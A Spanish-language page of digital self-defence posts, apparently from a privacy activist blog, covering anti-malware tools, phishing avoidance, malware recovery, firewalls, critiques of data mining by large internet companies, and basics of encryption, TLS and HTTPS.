Hay una herramienta libre y de código abierto contra el software malicioso llamada ClamAV, que funciona en Windows y GNU/Linux (disponible en Debian, Arch y otras, con el administrador del paquete incorporado). Sin embargo, ClamAV es solamente un escáner. Lo puedes usar para determinar si un archivo o directorio contiene software malicioso conocido — y lo puedes ejecutar desde una unidad de memoria USB en caso que no tengas autorización para instalar software en la computadora sospechosa — pero no supervisará tu sistema para protegerlo de infecciones.

Finalmente, puedes adquirir un producto comercial contra el software malicioso. Si es así, probablemente debas pagar una cuota anual por la licencia para seguir recibiendo constantemente las actualizaciones.

Mecanismos de compensación que vienen con el software contra el software malicioso

Los métodos de defensa contra el software malicioso requiere acceso total a tu sistema operativo para buscar archivos infectados y detectar comportamientos maliciosos. Como resultado, hay algunas situaciones en que instalarlo podría aumentar tu nivel de riesgo, sobre todo si está deficientemente diseñado o en peligro por una puerta trasera.

Dicho esto, es casi siempre beneficioso instalar una herramienta contra el software malicioso — sobre todo en Windows — a menos que seas un usuario con gran conocimiento técnico bajo el asedio de un poderoso adversario. Si crees que es tu caso, o si un experto te señala que así es, entonces deberás encontrar otras maneras de protegerte del software malicioso. Puedes cambiarte a un sistema operativo más fuerte como Tails, Subgraph OS, Whonix o Qubes, por ejemplo, o acceder a contenido delicado con una máquina aislada sin acceso a la red.

Consejos para utilizar herramientas contra el software malicioso de manera efectiva

  • No ejecutes dos herramientas contra el software malicioso al mismo tiempo. Muchas identificarán el comportamiento del otro programa contra el software malicioso como sospechoso y harán que deje de funcionar. El resultado puede ser que ninguna herramienta funcione adecuadamente.
  • Asegúrate de que tu programa contra el software malicioso te permita recibir actualizaciones. Muchas herramientas comerciales que vienen preinstaladas en computadoras nuevas deben registrarse (y pagarse) en algún momento o dejarán de recibir actualizaciones. Todo los softwares que recomendamos aquí se pueden actualizar gratis.
  • Asegúrate de que el software contra el software malicioso se actualice con frecuencia solo. El software malicioso nuevo se escribe y distribuye todos los días, y tu computadora pronto será vulnerable si no estás atento a nuevas definiciones de software malicioso. De ser posible, configura tu software para instalar actualizaciones automáticamente.
  • Si tu herramienta contra el software malicioso tiene la función opcional «siempre encendida», debes habilitarla. Diferentes herramientas tienen nombres diferentes para esta función: Protección en tiempo real, por ejemplo, o Protección permanente. Si no está activa por defecto, debes encenderla.
  • Considera hacer análisis ocasionales de todos los archivos de tu computadora. No es necesario hacerlo con frecuencia (y tal vez prefieras hacerlo durante la noche), pero los análisis explícitos pueden ayudar a identificar problemas con la función «siempre encendida» de tu herramienta contra el software malicioso o su mecanismo de actualización. La frecuencia puede depender de tus circunstancias. ¿Has conectado tu computadora a redes inseguras recientemente? ¿Con quién has compartido unidades de memoria USB? ¿Recibes adjuntos extraños con frecuencia por correo electrónico? ¿Otra persona en tu casa u oficina ha tenido hace poco problemas de software malicioso?

Evitar el software malicioso y ataques de phishing

Instalar software contra el software malicioso no es lo único que puedes hacer para proteger tu dispositivo. A continuación, algunas sugerencias adicionales.

  • Cuando sea posible, usa la última versión del sistema operativo que tiene tu dispositivo (Windows, Mac, Ubuntu GNU/Linux LTS, Android, iOS). Mantén ese sistema operativo actualizado. Instala actualizaciones en cuanto estén disponibles a través del mecanismo de actualizaciones automáticas.
  • Mantén todo otro software actualizado también. Instala actualizaciones en cuanto estén disponibles. En computadoras Windows y Mac, puede ser necesario que descargues y ejecutes un nuevo instalador. De ser así, asegúrate de usar la fuente «oficial».
  • Desinstala los software que ya no uses. El software obsoleto suele tener problemas de seguridad, y puedes tener instalada una herramienta que ya no esté actualizada.
  • Mejora la seguridad de tu navegador web y evita que ejecute automáticamente programas potencialmente peligrosos que a veces están contenidos dentro de las páginas web que visitas.
  • Ten cuidado cuando abras archivos que te envíen como correo electrónico o adjuntos en mensajería, a través de enlaces de descarga o cualquier otro medio. Es mejor evitar abrir archivos de fuentes desconocidas, aunque hasta las fuentes confiables pueden enviarte software malicioso involuntariamente. Y piensa dos veces antes de insertar medios extraíbles como memorias USB, tarjetas de memoria, DVD y CD en tu computadora.
  • Si necesitas abrir archivos o insertar medios externos de terceros con frecuencia, debes optar por tener un sistema dividido en compartimentos como Tails para evitar que el software malicioso infecte tu computadora o acceda a tus archivos delicados.
  • Nunca aceptes ni ejecutes aplicaciones de sitios web que no conoces y en los que no confías. En vez de aceptar una «actualización» ofrecida en una ventana emergente de tu navegador, por ejemplo, revisa el sitio web oficial de la aplicación pertinente.
  • Desinstala los plugins del navegador de Adobe Flash y Java o instala alguno para bloquear tales complementos de manera tal que únicamente  tú puedas habilitarlos cuando consideres apropiado y pertinente.
  • Si pasas tu ratón sobre un enlace o en una página web, verás la dirección completa del sitio web. Esto te puede ayudar a decidir si quieres o no hacer clic en ese enlace. Si usas Mozilla Firefox, puedes instalar el complemento NoScript. Las extensiones de navegador como Privacy Badger, HTTPSEverywhere y uBlock Origin también son útiles.
  • Mantente alerta cuando navegues en sitios web. Echa un vistazo a la dirección del sitio web antes de que sigas un enlace y asegúrate de que sea apropiado antes de ingresar información delicada como tu contraseña. Pon atención a ventanas del navegador que aparezcan automáticamente y léelas con cuidado en lugar de simplemente hacer clic en Sí o en OK.
  • Cuando sea posible, verifica el software que descargues antes de instalarlo.

Proteger tu teléfono inteligente o tableta de software malicioso

Los dispositivos inteligentes, teléfonos, y tabletas son cada vez más víctimas de software malicioso. Son susceptibles porque tendemos a dejarlos y a portarlos a donde quiera que vayamos. También contienen hardware de micrófonos, cámaras y GPS.

  • Como con las computadoras, mantén actualizados tu sistema operativo y aplicaciones.
  • Instala solamente de fuentes oficiales o confiables como Play Store de Google y Appstore de Apple (o F-droid, tienda de aplicaciones libre y de código abierto para Android). Las aplicaciones pueden tener software malicioso insertado y parecerá que funcionan normalmente, así que no siempre sabrás si alguna es maliciosa.
  • Presta atención a los permisos que solicitan tus aplicaciones. Si te parecen excesivos, niega la solicitud o desinstala la aplicación.
  • Considera instalar una herramienta confiable contra el software malicioso si hay disponibles para tu dispositivo.
  • Desinstalar las aplicaciones que ya no usas también puede ayudar a proteger tu teléfono inteligente o tableta. Los programadores a veces venden la propiedad de sus aplicaciones a terceros. Esos nuevos propietarios pueden seguir mejorando la aplicación o tratar de ganar más dinero insertando código malicioso.
  • Mira la Guía básica de seguridad para Android que te ayudará a saber más sobre cómo proteger tu teléfono inteligente o tableta.

Recuperándose del software malicioso

Si crees que tu dispositivo está infectado con software malicioso, debes tratar de desconectarlo de todas las redes a las que tenga acceso. Esto puede incluir redes inalámbricas, Ethernet, datos móviles, Bluetooth o cualquier otra red. Eso evitará que el software malicioso envíe datos adicionales, reciba nuevos comandos o infecte otros dispositivos en la red.

Evita conectar artículos como unidades de memoria USB y unidades de respaldo al dispositivo sospechoso, a menos que estés dispuesto a descartarlo o sepas cómo desinfectarlo de modo seguro. Igualmente, debes evitar usar artículos que estuvieron previamente conectados a ese dispositivo.

A veces puedes solucionar una infección de software malicioso solo con ejecutar tu software contra software malicioso y dejar que se encargue del problema. Por otro lado, hay softwares maliciosos diseñados para sobrevivir a una completa reinstalación del sistema operativo. La mayoría de infecciones están en algún lugar en el medio. En orden de menor a mayor esfuerzo (y, afortunadamente, del menos al más efectivo), a continuación presentamos algunas opciones:

  1. Haz un escaneo completo con tu actual herramienta contra software malicioso.
  2. Si el dispositivo sospechoso es una computadora, reiníciala desde un disco de rescate contra el software malicioso (como Knoppix, Ultimate Boot CD, System Rescue CD) y luego desecha la unidad de memoria USB que usaste para crear el disco de rescate.
  3. Si tienes una manera de restablecer tu dispositivo a las «configuraciones de fábrica», haz una copia de respaldo de tus archivos importantes y procede. No hagas copia de respaldo de software. Ten cuidado con el dispositivo de almacenamiento que usaste para el respaldo. Asegúrate de que esté limpio antes de conectarlo a tu dispositivo restaurado.
  4. Si el dispositivo sospechoso es una computadora, puedes reinstalar el sistema operativo después de hacer respaldos a tus datos importantes. Una vez más, asegúrate de que tu disco de respaldo esté limpio antes de conectarlo al dispositivo al que reinstalaste el sistema operativo. Si usas una unidad USB para reinstalar el sistema operativa, considera descartarlo.
  5. Haz una copia de respaldo de tus archivos importantes. No hagas copia de respaldo de software. Compra un nuevo dispositivo y asegúrate de que tu disco de respaldo esté limpio antes de conectarlo a tu dispositivo nuevo.

En los últimos tres ejemplos, podrías usar un liveUSB seguro que pueda arrancar la computadora como Tails, sin conexión a la red, para copiar los archivos respaldados del dispositivo de almacenamiento original a uno nuevo. Esta no es una solución perfecta, pero disminuirá la probabilidad de que tu unidad de respaldo reinfecte tu sistema.

Claramente, la mejor manera de enfrentar el software malicioso es evitarlo. Pero pensar en el potencial impacto, y planificar cómo reaccionarías puede ayudarte a recuperar más rápido si algún dispositivo se infecta.

Mantener tu software actualizado

Los programas de computación suelen ser grandes y complejos. Los fallos no descubiertos son más o menos inevitables, y algunos pueden minar la seguridad de un dispositivo. Los programadores de software siguen encontrando estos errores y lanzan actualizaciones para solucionarlos. Es esencial que actualices todo el software de tu computadora, incluido el sistema operativo, con tanta frecuencia como puedas. Probablemente, esto es lo más importante que puedes hacer para proteger tu dispositivo del software malicioso.

Estar actualizado con herramientas libres y de código abierto y freeware

El software propietario a menudo requiere que pruebes que se adquirió legalmente antes de que te permita instalar actualizaciones. Si usas una copia pirata de Microsoft Windows, por ejemplo, tal vez no pueda actualizarse, con lo que tú y tu información quedarían extremadamente vulnerables. Hay softwares piratas que incluso vienen con el software malicioso ya instalado. Al no tener una licencia válida, tú y otros están en riesgo.

A su vez, confiar en un software ilegal puede presentar riesgos no técnicos. En algunos países, las autoridades usan la piratería de software como un pretexto para confiscar dispositivos y clausurar oficinas de organizaciones con las que tienen diferencias políticas.

Afortunadamente, no tienes que adquirir software costoso para protegerte de amenazas como esas. El software libre y de código abierto es software que se puede obtener y actualizar sin costos, y cuyo código fuente está disponible públicamente. Generalmente, estas herramientas libres y de código abierto son consideradas más seguras que las propietarias, y todas las demás son iguales, porque su código lo puede examinar un grupo de expertos, y cualquiera puede identificar problemas y contribuir con soluciones. Este enfoque transparente a las novedades también hace que sea mucho más difícil esconder una puerta trasera en una parte del software de código abierto.

El freeware es software que se distribuye sin costos, pero que no es de código libre ni abierto. Aunque no se beneficia de la transparencia del software libre y de código abierto, puede ser más seguro, rentable y eficiente que el software propietario que está pirateado o «expirado». Considera probar alternativas libres y de código abierto para el software propietario, privativo y de código cerrado en el que confías. Si no encuentras nada que funcione para ti, evalúa las alternativas de freeware antes que el software sin licencia que puedes estar usando.

Las aplicaciones libres y de código abierto suelen ser similares y compatibles con el software propietario que reemplazan. Aunque tus colegas sigan usando la versión comercial de un tipo particular de programa, todavía puedes intercambiar archivos y compartir información con ellos con bastante facilidad. Como punto de inicio, puedes evaluar reemplazar Microsoft Internet Explorer y Microsoft Office por Mozilla Firefox y LibreOffice.

También hay alternativas libres y de código abierto a los sistemas operativos Windows y MacOS X. Entre esos, el más popular es GNU/Linux, y probablemente es el más seguro, rentable, eficiente y fácil de usar. Para probarlo, puedes descargar una versión portable en vivo de la distribución que gustes, grabarla en una unidad de memoria USB, ponerlo en tu computadora, reiniciarla y acceder a las opciones de arranque. Cuando finalice la carga, tu computadora ejecutará GNU/Linux, y puedes decidir qué te parece sin hacer cambios permanentes de ninguna forma ya que todo se destruirá cuando apagues la máquina. Una vez que termines, simplemente apaga tu computadora y retira la memoria USB. La siguiente vez que la enciendas, arrancará nuevamente con tu sistema operativo principal, y todas tus aplicaciones, configuraciones y datos estarán intactos tal como los dejaste.

Además de las ventajas en seguridad, rentabilidad, eficiencia y rapidez del software de código abierto y libre, muchas distribuciones brindan medios de actualización fáciles de usar que evitará que tus aplicaciones, y el propio sistema operativo, queden obsoletos e inseguros. GNU/Linux también es una buena opción para hardware muy antiguo para ejecutar las actuales versiones de Microsoft Windows o MacOS X.

Cortafuegos

Un cortafuegos es el primer programa en una computadora que ve los datos entrantes de internet. Es también el último programa que gestiona datos salientes. Como un guardia de seguridad apostado en la puerta de un edificio para decidir quién puede entrar y quién puede salir, un cortafuegos recibe, inspecciona y toma decisiones sobre tráfico de red.

Las conexiones de red llegan a tu dispositivo a través de puertos numerados. Estos puertos permiten que el software en tu dispositivo escuche y responda solicitudes. Si los cortafuegos son los guardias, estos puertos son las propias puertas, y se pueden abrir o cerrar. En un puerto cerrado no hay software que escuche. No hay manera de que un atacante externo aproveche ese puerto directamente. Debido a eso, no todos los dispositivos vienen con un cortafuegos activado. Las Mac salen con su aplicación de cortafuegos inhabilitada, por ejemplo, y el GNU/Linux Firewall por defecto está configurado para permitir que casi todo entre (ni los dispositivos Android ni los iOS tienen cortafuegos). Pero eso no significa que estos sistemas estén abiertos a todas las conexiones de red. Significa que confían en que su software no está escuchando cuando no se debe. Son como los propietarios de edificios que no se preocupan de tener guardias y cámaras porque confían en cuáles puertas están sin cerrojo, cuáles tienen una barrera y cuáles se abrirán solamente a quienes tengan determinadas llaves.

No obstante, las computadoras son complicadas, ya a veces pueden hacer cosas inesperadas. Los cortafuegos nos ayudan a proteger nuestros dispositivos en situaciones donde un software empieza a escuchar a un puerto cuando no es lo de que debe hacer. En otras palabras, cuando una puerta se queda abierta, ya sea por accidente o por una persona maliciosa en el edificio. Si conoces la lista de puertos que deberían estar accesibles en tu computadora — y no quieres agregar puertos adicionales a esa lista solamente porque se instala un nuevo software — echa un vistazo a la sección de software de Firewall debajo.

Dicho eso, la configuración por defecto de los cortafuegos en un sistema operativo moderno debería funcionar bien para la mayoría.

Finalmente, mientras se piensa en los cortafuegos como los describimos arriba — como una manera de negarles a los atacantes externos un camino fácil a nuestros dispositivos — muchos dan seguimiento a conexiones salientes también. Con eso, a veces pueden comunicarnos cuando el software malicioso está tratando de robar nuestros datos o «llamar a casa» con instrucciones. Si instalas un cortafuegos que esté diseñado específicamente para limitar conexiones salientes, o si configuras tu cortafuegos incorporado para funcionar así, debes prepararte a pasar un tiempo «entrenándolo» para que solamente te alerte cuando observe algo inusual.

Software de cortafuegos

Todas las versiones actuales de Windows incluyen un cortafuegos incorporado, que se enciende por defecto. Como se menciona arriba, MacOS X tiene un cortafuegos, pero está inhabilitado. Habilitarlo casi no causa problemas y probablemente sea una buena idea. De tofas formas, aprenderás más sobre cortafuegos si observas cómo está configurado. GNU/Linux viene con un cortafuegos poderoso, aunque difícil de usar, llamado iptables. Si quieres agregar restricciones a tu cortafuegos de GNU/Linux, debes evaluar instalar gufw usando el administrador de paquetes. Es una interfaz de usuario gráfica para la aplicación Uncomplicated Firewall (UFW), que hace que iptables sean más fáciles de administrar.

Evitar conexiones de red no confiables

  • Asegúrate de que todas las computadoras Windows en las redes de tu casa y oficina tengan un cortafuegos instalados y habilitados.
  • Asegúrate de que tu enrutador o punto de acceso de red inalámbrica tenga un cortafuegos habilitado. La mayoría lo tiene, pero vale la pena revisar. El enrutador es lo único entre tu red local y un internet lleno de actividades maliciosas. También debes cambiar la contraseña de administrador que se usó para modificar las configuraciones del enrutador a una que sea fuerte y única.
  • Instala solamente softwares esenciales en los dispositivos que usas para trabajo delicado. Asegúrate de obtener este software de una fuente confiable, y tenlo actualizado.
  • Inhabilita todos los servicios del sistema, como intercambio local de archivos que ya no uses.
  • Desconecta tu computadora de internet cuando no la estés usando y apágala durante la noche.
  • No compartas la contraseña de tu dispositivo con nadie.

Lecturas y herramientas adicionales

  • Mantente al día con noticias relacionada con el software malicioso en sitios web como Threatpost y Virus Bulletin.
  • Otras herramientas de Tactical Technology Collective te pueden ayudar a utilizar software libre y de código abierto o herramientas de Freeware.
  • Libre Office es una alternativa FOSS a Microsoft Office para computadores con sistemas operativos Windows, Mac y GNU/Linux.
  • Algunas distribuciones GNU/Linux fáciles de usar son Mint, CentOS o Manjaro.
208 comentarios

Defendamos nuestra privacidad

Publicada el 01/06/2019 por Anonymous Chile

La máquina nos vigila

Se nos dice: «No publiques en Internet nada que no estés dispuestx a gritar en una plaza»; sin embargo este consejo genera una falsa impresión de la dimensión del problema. Los datos que compartimos en la red no sólo son revisados por personas, sobre todo Son analizados por software que tiene acceso de manera simultánea a todo el historial de nuestro perfil y puede compararlo o vincularlo con los perfiles de otrxs a una escala macro. Compartirte en este espacio conlleva riesgos de otra magnitud. A diferencia de los servicios de inteligencia humanos, las máquinas pueden vigilar cada hogar, no duermen y no olvidan,

Algo que nos ayuda a todxs es colocar el tema sobre la mesa, platicar con amistades, familias, colectivos organizaciones acerca de la importancia de proteger nuestro derecho a la privacidad y reflexionar sobre cómo comunicarnos por Internet implica riesgos muy distintos a los de cualquier otro medio que hemos conocido antes.

Es importante hablar del tema sin que ello provoque un miedo que nos paralice; sino uno que nos lleve a tomar acción. No siempre podemos evitar comunicarnos por la red o por teléfono pero sí podemos cambiar algunos de nuestros hábitos de uso. También podemos aprender a utilizar herramientas de seguridad que nos permitan cifrar nuestras comunicaciones.

Cambiemos nuestra relación con las tecnologías

  • Formemos y seamos parte activa de comunidades que no se vean a sí mismas sólo como usuarixs; sino que contribuyan a desarrollar otras formas comunicativas y organizativas.
  • Acerquémonos a Colectivos y organizaciones que estén trabajando sobre el tema.
  • Elijamos servicios que se comprometan a no almacenar, analizar o lucrar con nuestros datos personales y gestionados en servidores que sean administrados por colectivos y organizaciones comprometidos a defender los derechos de sus usuarixs.
  • Participemos en acciones y campañas contra las prácticas predatorias y violatorias de nuestros derechos a la privacidad que vienen del Estado y las empresas.
  • Reciente información evidencia el ataque a periodistas, activistas»’ defensores de derechos mediante engaños para instalar software malicioso en teléfonos o tabletas y espiarles. La comunicación cifrada no evita este nivel de vigilancia si tu aparato esta comprometido localmente. Debemos tomar precauciones para que los complejos mecanismos de vigilancia masiva no puedan interceptar nuestros datos.
  • Defendamos nuestro derecho de compartir información y reflexiones con las comunidades en las que confiamos.
  • Recomendamos utilizar el sistema operativo GNU/Linux vía una distribución que pueda funcionar sin software privativo y sea desarrollada por una comunidad.

No a la minería de datos

Publicada el 01/06/2019 por Anonymous Chile

Cuando algo es «gratis», el producto eres tú porque tu privacidad y datos personales son el nuevo capital.

Muchos de los servicios gratuitos de Internet forman parte de una industria extractiva. Google, Facebook, Twitter, Dropbox, WhatsApp, Instagram y otros servicios populares no cobran de manera explícita porque sus ganancias provienen de colocar anuncios personalizados dentro de sus sitios; para ello recolectan nuestros datos y patrones de uso para sacar información útil a través de un método de análisis conocido como minería de datos.

Los servicios de Internet que parecen gratuitos, en realidad no lo son. El costo de proporcionar a cada usuarix una cuenta de correo, un perfil en una red social o una carpeta de almacenamiento es insignificante comparado con las grandes ganancias que estas empresas perciben mediante la minería de datos.

Abrir una cuenta en estos servicios requiere que aceptemos sus términos y condiciones de uso y con ello otorgamos el permiso de utilizar nuestros datos para un fin desconocido. Podría ser que hoy solo se utilicen para vender publicidad pero lo preocupante es no saber qué uso les darán mañana, ya que efectivamente pasan a ser de su propiedad.

En este nuevo modelo de negocios no solo somos usuarixs de la red, somos a la vez materia prima, trabajadorxs explotadxs, productos y consumidorxs.

Nuestros datos personales, patrones de uso y listas de contactos son la materia prima. Somos también lxs trabajadorxs que dan forma a la información con cada «me gusta», retuit o enlace que visitamos.

Nuestros propios perfiles en las redes sociales son el atractivo principal para usar estos servicios, colocándonos como un producto. Además, somos también consumidores de la información de otros perfiles y de la publicidad dirigida al nuestro.

Es importante reconocer el valor de nuestros datos personales. Evitemos utilizar servicios en Internet que lucran con la recolección de nuestros datos a costa de nuestro derecho a la privacidad.

No aceptar que las grandes empresas de Internet nos vigilen es una medida de autodefensa y seguridad y también una postura política.

25 comentarios

Mantener tus comunicaciones privadas, plataformas protegidas y sistemas cifrados

Publicada el 01/06/2019 - 06/10/2021 por Anonymous Chile

Entender cómo proteger tus comunicaciones digitales significa entender diversos problemas y amenazas. Hay consideraciones técnicas, como lo que ocurre con tus mensajes entre tu computadora y la del destinatario, pero también hay otros aspectos, como mantener tu dispositivo protegido contra el software malicioso, usar buenas contraseñas, evitar intentos de phishing y tener un plan de comunicaciones que satisfaga tus necesidades.

Introducción a la comunicación digital

Cuando conversas en persona o entregas una nota sobre un tema delicado, es relativamente fácil pensar quién puede haber escuchado o leído esa información. Con la comunicación digital, además de quién puede escucharla o verla físicamente, las infraestructuras y elecciones de los proveedores de servicios afectan la exposición de tus comunicaciones.

Hay muchas maneras diferentes de comunicarse por Internet y redes telefónicas. Cada método tiene ventajas y desventajas según tu conveniencia, tus necesidades de comunicación y la privacidad o seguridad de tu mensaje. Entre otras, las principales formas de comunicación que usan tecnología son:

  • Telefonía móvil y fija.
  • SMS o mensajes de texto en redes de telefonía móvil.
  • Correo electrónico.
  • Mensajería que usa servicios y una conexión a Internet (por lo general incluye mensajes cortos, fotos, llamadas de voz y llamadas de video).
  • Foros y plataformas de discusión.

Aunque hay información que es específica a la forma de comunicación o una herramienta específica, hay ideas generales que te ayudarán a entender dónde pueden quedar expuestas tus comunicaciones y qué puedes hacer para evitar o reducir algunos riesgos. Puedes encontrar más información específica según la herramienta en las guías para Thunderbird, Enigmail y GPG para Windows, GNU/Linux, Mac y Signal for Android.

A dónde van tus mensajes

Cuando usas Internet, tu información viaja a través de muchas partes de hardware e infraestructuras controladas por muchas empresas y actores diferentes. Aunque no es posible predecir la ruta exacta que tomará una información específica, es posible explicar qué pasa de manera general.

Cuando visitas un sitio web en tu computadora, tu navegador envía una solicitud a ese sitio web a través de tu conexión inalámbrica, pasa a través del enrutador de tu casa, la infraestructura local de Internet y luego a tu proveedor de servicios de Internet. Luego pasa a través de diversos servidores y probablemente por al menos una entrada nacional, después al proveedor de servicios de Internet del sitio web, al enrutador del grupo de servidores y finalmente al servidor que contiene el sitio web. Cuando la solicitud llega al servidor del sitio web, el servidor envía la información que tu navegador necesita para desplegar una copia del sitio web por una ruta similar, aunque no exactamente igual. Esta es una versión simplificada de lo que ocurre e ignora componentes y rastreadores del sitio web de un tercero, que significa que la solicitud al final va incluso a más lugares. Hablaremos sobre las comunicaciones telefónicas más adelante.

Las comunicaciones que se hacen a través de la web se comportan como cualquier otra información que se envía a través de Internet. Revisar tu correo electrónico, usar una aplicación de chat o visitar un foro, todo eso funciona como cuando visitas cualquier otro sitio web. Con un sitio web típico, desde tu computadora, a través de la infraestructura de Internet, al servidor del sitio web y luego de vuelta del servidor, a través de la infraestructura de Internet, a ti. Con el correo electrónico y algunas aplicaciones de chat, tu mensaje va del servidor de tu proveedor de correo electrónico, a través de la infraestructura de Internet, al servidor del proveedor de correo electrónico de el/la destinatari@, para que luego siga la misma ruta desde est@ último, como antes ocurrió desde el servidor del sitio web a tu computadora.

A lo largo de estas rutas, tu tráfico de Internet, tus dispositivos electrónicos, tus comunicaciones y tu vida privada, pueden estar siendo interceptad@s, intervenid@s, monitorizad@s, espiados y vigilados de múltiples formas:

  • En tu computadora, teléfono inteligente u otros dispositivos donde manejes, gestiones y administres tus asuntos personales, no existe una metodología, técnica, sistema o procedimiento 100% de seguridad infalibles y por completo efectiv@s que puedan evitar de manera confiable cualquier tipo de sabotaje o intervención en las distintas plataformas o la comunicación entre ellas.
  • En el enrutador inalámbrico, si tiene software malicioso, está controlado o alguien está interviniendo, interceptando e interfiriendo en su correcto funcionamiento.
  • Por tu proveedor de servicios de Internet, incluso en nombre de las autoridades o delincuentes.
  • En entradas nacionales (aunque tú y el destinatario o sitio web estén en el mismo país).
  • En el acceso al tráfico de Internet con cables físicos y ramas principales.
  • Por el proveedor de servicios de Internet del servicio o sitio web que estás usando.
  • Por el proveedor de servicios de Internet de las personas con las que te comunicas.
  • En el servidor que almacena o enruta tus comunicaciones.
  • En el enrutador inalámbrico del destinatario si tiene software malicioso o lo controla alguien malicioso.
  • En la computadora o teléfono inteligente de las personas con las que te comunicas.

Usar cifrado, cuidar tu teléfono inteligente y computadora y conocer los pasos a seguir para proteger tus comunicaciones son importantes. Se unen para proteger tus comunicaciones de diferentes problemas. Si te preocupa que tu proveedor de servicios de Internet o quien controle tu punto de acceso inalámbrico pueda interceptar o vigilar tus comunicaciones, puedes usar una VPN, o red privada virtual, para proteger más tu tráfico de Internet. De cómo proteger tu tráfico de Internet tratamos en cómo permanecer anónimo y eludir la censura en Internet. En muchos niveles diferentes, tus comunicaciones podrían estar en la mira de agencias gubernamentales, corporaciones, delincuentes (incluidos grupos de crimen organizado) y grupos semiorganizados opuestos a tus objetivos.

También hay muchas maneras en que tu tráfico puede ser rastreado hasta ti. Para evitarlo, puedes crearte una cuenta de correo electrónico, mensajería o almacenamiento virtual que no permita identificarte, puede significar que su creación y acceso sea solamente mediante el navegador del enrutador cebolla, Tails, Whonix, Subgraph OS, o estando en un Cybercafé donde tu persona física con tu identidad virtual y no exista manera de relacionar ambos.

Comunicación «telefónica»

Cuando visitas un sitio web en tu móvil, la solicitud desde el navegador pasa por la conexión de datos del dispositivo a torres de telefonía cercanas. Las torres pueden estar controladas por tu proveedor de telefonía o por otro proveedor que tiene un acuerdo con tu proveedor de servicio telefónico. A veces, tu proveedor de telefonía es también el proveedor de servicios de Internet. Si son empresas diferentes, la solicitud va desde la torre de telefonía hasta tu proveedor, y luego al proveedor de servicios de Internet, y desde ahí toma la misma ruta de solicitud en tu computadora.

Los teléfonos inteligentes y los teléfonos básicos tienen un hardware de conexión de red especializado llamado tarjeta de banda base que se conecta a la red de telefonía. Las torres telefónicas o puntos de conexión pueden permitir diferentes conexiones para datos y también para llamadas y mensajes SMS. A veces, tus llamadas de voz y mensajes SMS pueden pasar por la conexión de parte de datos en lugar de la conexión habitual. Aunque las conexiones comunes y corrientes entre un teléfono móvil y una torre de telefonía están mayormente cifradas, muchas veces son fáciles de interceptar y leer o escuchar a través de diversos ataques con equipo común disponible.

Los teléfonos inteligentes y algunos teléfonos básicos te permiten usar aplicaciones para comunicación más segura con tu teléfono y una conexión de datos. Muchas de estas aplicaciones y plataformas también tienen versiones para computadoras. Hay factores que hacen que comunicarse usando un teléfono inteligente sea diferente que usar una computadora para el mismo programa o plataforma. Tal vez quieras poner alguna herramienta de comunicación en tu teléfono inteligente o tu computadora, o tal vez quieras ponerlos en los dos. Puedes leer más sobre estos factores en cómo usar teléfonos y dispositivos inteligentes de manera segura.

Diferentes clases de cifrado

El cifrado es una manera de usar matemáticas inteligentes para cifrar el contenido de un mensaje para que solamente lo pueda descifrar y leer alguien que tiene una información particular, como una contraseña o una clave de cifrado.

Puedes cifrar tus archivos y disco duro, que se explica con más detalle en la guía sobre cómo proteger los archivos delicados en tu computadora. Dependiendo de cómo está configurado un enrutador inalámbrico, tus datos pueden ser cifrados entre tu dispositivo y el enrutador inalámbrico. Muchos servicios cifran tus datos entre tu dispositivo y sus servidores, pero podrán ver los datos en el servidor, aunque el servicio no esté destinado a ese destinatario. El cifrado de extremo a extremo, a veces conocida como E2E, es cuando tus datos están cifrados en todo momento desde tu computadora personal o teléfono inteligente al de la persona que quieres que los lea. Con E2E, ni tu proveedor de servicios ni un tercero que quiera interceptar estará autorizado a ver tus datos.

Cuando decimos que algo está cifrado puede haber partes que no están ocultas. El cifrado más comúnmente discutida para las comunicaciones digitales se centra en el contenido de la comunicación, como el cuerpo de un correo electrónico o las palabras en un mensaje de texto. Pero no todas las formas de cifrado protegen los detalles de un mensaje, por ejemplo, el remitente, destinatario, fecha, hora, lugar, dispositivo usado y muchos otros datos discretos. Esta “información sobre la información” se llama metadatos.

Los metadatos pueden parecer relativamente insignificantes, pero cuando se combina un gran volumen, estos datos agregados pueden revelar detalles de tu red y patrones en tu trabajo y tu vida personal. Si usas un método de comunicación que no cifra los metadatos o un servicio que almacena y comparte los metadatos, tal vez debas usar cuentas separadas de uso único para que sea más difícil conectar esa comunicación con tus patrones mayores. Si usas una cuenta especial, asegúrate de entender cuánta protección brinda de acuerdo con cómo configuras todo y qué opciones de uso eliges.

TLS y HTTPS

Los métodos más comunes para cifrar datos entre tu dispositivo y un servidor es TLS, que significa Transport Layer Security (seguridad de capa de transporte). Es el sucesor de SSL (Secure Socket Layer, capa de puertos seguros). Usar TLS es la diferencia entre HTTP y HTTPS. Puedes saber si estás usando una conexión cifrada si miras la barra de direcciones de tu navegador web. HTTPS es ahora la norma para sitios web, aunque algunos sitios web todavía admiten conexiones HTTP o no tienen configurado HTTPS. Si controlas un sitio web sin HTTPS, Let’s Encrypt puede ayudarte a arreglarlo.

La S adicional al final significa que tu computadora ha abierto una conexión segura con el sitio web. También notarás el símbolo de un ‘candado’ en la barra de direcciones. Algunos navegadores marcan los sitios HTTP como «no seguros». Son pistas para que sepas que será mucho más difícil acceder a escondidas en tu comunicación con ese sitio web en particular.

Además de proteger contraseñas y transacciones financieras, esta clase de cifrado te ayuda a proteger tu correo web mientras se traslada entre tu proveedor de correo electrónico y tú. Puedes usar el plugin HTTPS Everywhere en Windows, GNU/Linux y Mac para que tu navegador se asegure de que gran parte de tu tráfico, incluidas las comunicaciones que usan el navegador, pasen por conexiones HTTPS. No debes usar un proveedor de correo electrónico que no te pueda ofrecer conexiones HTTPS. Si tu proveedor de correo electrónico no ofrece HTTPS, cámbiate a un proveedor que sí lo ofrezca, como Riseup.

TLS y HTTPS protegen tu comunicación entre tu dispositivo y los servidores del correo electrónico u otra plataforma de comunicación que uses, pero es importante recordar las limitaciones. TLS y HTTPS no protegen tu comunicación después de que llegan a sus servidores. Esto significa que lo que hayas enviado se puede leer dentro de sus servidores, y que puede no haber la misma protección entre servidores y el destinatario. Por ejemplo, si envías un correo electrónico a una persona o a una lista de correos, puede viajar cifrado entre tu computadora y el servidor de correo electrónico, pero puede no haber cifrado entre tu servidor de correo electrónico y el destinatario. Podría haber un servidor de correo electrónico para una lista de distribución en el medio que no ofrezca cifrado.

